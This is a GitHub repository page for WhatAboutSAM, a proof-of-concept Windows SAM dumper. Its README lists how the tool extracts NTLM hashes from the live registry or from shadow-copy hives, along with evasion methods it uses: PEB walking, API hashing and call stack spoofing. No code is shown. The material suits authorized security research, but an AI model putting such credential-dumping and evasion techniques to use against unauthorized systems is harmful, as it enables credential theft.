Skip to content

PeterGabaldon/WhatAboutSAM

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

154 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CICD AssemblyScript C C++ Visual Studio Windows

"Buy Me A Coffee"

WhatAboutSAM

⚠️ Disclaimer: Authorized Educational Use Only

This project is intended strictly for cybersecurity education and authorized security research. It may only be used in environments where you have clear, prior, and explicit permission to perform credential and SAM-related testing, such as systems you own or systems covered by a valid authorization agreement.

By no means may this project be used against any system, account, network, or data without prior authorization. Unauthorized use is prohibited and may violate applicable laws, policies, and professional ethics. Users are solely responsible for ensuring that every use of this project is lawful, permitted, and properly scoped.

Introduction

WhatAboutSAM is my custom Windows SAM dumper. It can read SAM material directly from the live registry or from offline hives exposed through a Shadow Snapshot. The live registry method needs SYSTEM privileges, while the Shadow Snapshot method only needs an elevated administrator context because it reads the SAM and SYSTEM hives from a VSS snapshot. I wanted to study at a low level how Windows stores local user credentials in the Security Account Manager (SAM). As a Cybersecurity Engineer with a mostly offensive mindset, I have used many times the tools we all know: mimikatz, secretsdump (impacket), pwdump, hashdump (metasploit), crackmapexec (--sam parameter), LaZAgne...

Also, I wanted to practice some malware development techniques (enumerated below) and I needed an excuse for it. That is why I decided to implement my custom SAM Dumper.

It is currently in development.

Please, take a look at the credits because without these projects this would not have been possible.

Sample execution

Characteristics and possibilities

  • Live registry method (-r, --registry): reads the protected SAM and SYSTEM registry material through native ntdll calls. This method needs SYSTEM privileges.
  • Shadow Snapshot method (-ss, --shadowSnapshot): creates a VSS snapshot of C:\, reads Windows\System32\Config\SAM and Windows\System32\Config\SYSTEM from the snapshot, and parses the offline hives with Offreg.dll. This method needs administrator privileges, not SYSTEM privileges.
  • NTLM hash recovery: extracts local user records, derives the bootkey/syskey material, and prints NTLM hashes for local accounts.
  • SAM format handling: supports the post-Windows 10 1909 AES-based path and includes the legacy RC4-based path, which still needs more testing.
  • Native API resolution: walks the PEB and uses API hashing to resolve ntdll exports without calling GetModuleHandle or GetProcAddress.
  • Optional call stack spoofing path (-cc, --customCallback): proxies selected native calls through custom callbacks.
  • Debug output (-d, --debug): prints detailed acquisition and decryption traces for development and research.

TODO List

  • PEB Walking (avoid GetModuleHandle + GetProcAddress)
  • Call Stack Spoofing with Custom Callbacks (Thread Pools)
  • Native Functions
  • API Hashing
  • Travis CI (Finally done with Github Actions)
  • Debug Branch vs Release Branch
  • Shadow Snapshot Method
  • Test Old Algorithm. What a bummer. Microsoft Changed storage in SAM in Windows 10 1909
  • Command Line Parameters
  • Add more comments :)
  • Debug prints
  • Add optional SYSTEM elevation for the live registry method

Credits

Please, take a look to these projects, without them I could not have developed WhatAboutSAM.

About

WhatAboutSAM is my custom PoC of a Windows SAM dumper

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Sponsor this project

 

Packages

 
 
 

Contributors

Languages